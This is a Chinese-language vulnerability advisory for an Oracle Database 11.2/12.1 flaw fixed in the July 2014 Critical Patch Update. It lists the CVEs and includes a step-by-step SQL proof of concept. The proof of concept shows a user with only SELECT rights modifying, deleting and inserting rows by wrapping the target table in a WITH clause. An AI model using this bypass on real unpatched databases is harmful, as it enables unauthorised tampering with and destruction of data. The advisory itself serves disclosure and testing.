【性質】高危漏洞【危害】僅有查詢權限的用戶可以對數據進行增、刪、改操作【影響范圍】廣泛,包括11.2.0.3,11.2.0.4,12.1等版本(10g版本不包含)。【修復】2014年7月的CPU中被修正,強烈建議您檢查所有Oracle數據庫,確認是否存在該安全風險。與此有關的CVE號包括:CVE-2013-3751、CVE-2014-4236、CVE-2014-4237、CVE-2014-4245、CVE-2013-3774 .相關信息還可以參考Oracle的CPU頁面:http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html【bug test】--100.95 Oracle Database 11g EnterPRise Edition Release 11.2.0.3.0 - 64bitSQL> conn ncv502/ncv502create user test identified by test;grant create session to test;create table t (ID number(4)); insert into t(ID) values(1); select * from t;grant select on t to test;SQL> conn test/testselect * from ncv502.t;update ncv502.t set id = 1 where id = 1; *第 1 行出現錯誤:ORA-01031: 權限不足--在WITH語句中,權限限制被完全繞過,增刪改權限被獲得SQL> update (with tmp as (select id from ncv502.t) select id from tmp) set id = 0 where id = 1;1 row updated.SQL> commit;Commit complete.SQL> delete (with temp as (select * from ncv502.t) select id from temp) where id = 0;1 row deleted.SQL> insert into (with temp as (select * from ncv502.t) select * from temp) select 2 from dual;1 row created.drop table t purge ;drop user test cascade;--71 Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit 沒有該bug
